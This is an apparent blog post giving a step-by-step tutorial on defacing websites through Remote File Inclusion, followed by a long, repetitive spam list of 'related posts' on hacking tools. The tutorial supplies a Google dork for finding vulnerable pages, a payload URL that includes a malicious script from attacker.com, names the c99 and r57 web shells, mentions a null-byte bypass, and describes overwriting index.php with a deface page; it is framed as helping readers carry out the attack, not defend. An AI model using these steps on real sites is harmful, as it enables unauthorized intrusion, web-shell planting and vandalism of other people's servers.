2024年1月24日 星期三

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related posts
  1. Hacking Tools Name
  2. Game Hacking
  3. Pentest Tools Port Scanner
  4. Hacking Tools Hardware
  5. Pentest Tools Android
  6. Pentest Tools Website
  7. Free Pentest Tools For Windows
  8. Hacker Tools Apk Download
  9. Hacker Techniques Tools And Incident Handling
  10. Hacker Tools Software
  11. Hacker Tools Online
  12. Computer Hacker
  13. Hacking Tools
  14. Hack Tool Apk
  15. Hacker
  16. Hacking Tools For Kali Linux
  17. Github Hacking Tools
  18. Blackhat Hacker Tools
  19. Nsa Hack Tools
  20. Hacking Tools For Kali Linux
  21. World No 1 Hacker Software
  22. Hacking Tools For Pc
  23. Hack Apps
  24. Beginner Hacker Tools
  25. Hacker Tool Kit
  26. Hack Tools For Ubuntu
  27. Bluetooth Hacking Tools Kali
  28. Hack Apps
  29. Hack Apps
  30. Nsa Hacker Tools
  31. Hacking Tools 2019
  32. Hacker Tools Hardware
  33. Hack Tools Download
  34. Hacker Tools Windows
  35. Growth Hacker Tools
  36. Hak5 Tools
  37. Easy Hack Tools
  38. Nsa Hack Tools
  39. Pentest Tools Free
  40. Tools For Hacker
  41. Hacker Tools Free Download
  42. Hacking Tools For Windows
  43. Tools 4 Hack
  44. Ethical Hacker Tools
  45. Hacking Tools Software
  46. Hacking Tools Download
  47. Hacking Tools Pc
  48. Hacker Search Tools
  49. Pentest Tools List
  50. Hack Tools For Mac
  51. Hacker Tools For Pc
  52. Pentest Tools Open Source
  53. Top Pentest Tools
  54. Pentest Tools Free
  55. Hacker Tools For Pc
  56. Nsa Hack Tools
  57. Pentest Tools Url Fuzzer
  58. Hackrf Tools
  59. Pentest Tools Kali Linux
  60. Hacker Tools For Ios
  61. Pentest Tools Bluekeep
  62. Hack And Tools
  63. Pentest Tools Tcp Port Scanner
  64. Hacking Tools For Beginners
  65. Nsa Hack Tools Download
  66. Hack Tools Mac
  67. Easy Hack Tools
  68. Best Hacking Tools 2019
  69. Hacker Tools Free Download
  70. Pentest Tools For Android
  71. Pentest Tools Windows
  72. Hacking Tools Kit
  73. Hacking App
  74. Pentest Tools Github
  75. Hacking Tools
  76. Best Hacking Tools 2020
  77. Best Pentesting Tools 2018
  78. Beginner Hacker Tools
  79. Hacker Tools List
  80. Hacking Tools For Windows Free Download
  81. Pentest Tools Url Fuzzer
  82. Hack Apps
  83. Pentest Tools Bluekeep
  84. Pentest Tools Framework
  85. Pentest Tools Review
  86. Pentest Tools Online
  87. Pentest Tools Github
  88. How To Make Hacking Tools
  89. Pentest Tools For Android
  90. Pentest Tools Kali Linux
  91. Hack Tools 2019
  92. Hack Rom Tools
  93. Hacking Tools Download
  94. What Are Hacking Tools
  95. Growth Hacker Tools
  96. Bluetooth Hacking Tools Kali
  97. Hacking Tools For Pc
  98. Hacker Tools Linux
  99. Tools Used For Hacking
  100. Hacking Tools 2020
  101. Hack Tools For Ubuntu
  102. Hacking App
  103. Nsa Hack Tools
  104. Hacker Tools Windows
  105. Hacking Tools Software
  106. Android Hack Tools Github
  107. Pentest Tools Linux
  108. Pentest Tools For Ubuntu
  109. Hacker Tools Apk
  110. Android Hack Tools Github
  111. Hacker Tools For Ios
  112. Hacking Tools For Kali Linux
  113. Hacker Tools 2019
  114. Tools Used For Hacking
  115. Hacker Tools Free Download
  116. How To Install Pentest Tools In Ubuntu
  117. Pentest Tools For Windows
  118. Hak5 Tools
  119. Pentest Tools Download
  120. Hacking Tools
  121. Hacker Tools Github
  122. Hacking Tools And Software
  123. Pentest Tools List
  124. Hacking Tools Windows
  125. Hack Tools
  126. Nsa Hack Tools
  127. Hack Tools For Games
  128. Hacking Tools Software
  129. Pentest Tools Port Scanner
  130. Hackrf Tools
  131. Hack Tools Online
  132. Bluetooth Hacking Tools Kali
  133. Hack Tools Mac
  134. Pentest Tools Apk
  135. Pentest Recon Tools
  136. Hacking Tools Download
  137. Hack Tools
  138. Pentest Tools For Ubuntu
  139. Hacking App
  140. Pentest Recon Tools
  141. Pentest Tools Website
  142. Hacking Tools Online
  143. Hacker Tools 2019
  144. Hacking Tools For Games
  145. Hack And Tools
  146. Hack Tool Apk No Root
  147. Nsa Hack Tools Download
  148. Growth Hacker Tools
  149. Pentest Reporting Tools
  150. Top Pentest Tools
  151. Pentest Tools Android
  152. Pentest Tools For Windows
  153. Pentest Reporting Tools
  154. Hacker Tools List
  155. Hacker Tools List
  156. Pentest Tools Subdomain
  157. Hacker Tools For Pc
  158. Pentest Tools Open Source
  159. Hacker Tools 2019
  160. Pentest Reporting Tools
張貼者:

沒有留言:

張貼留言

訂閱: 張貼留言 (Atom)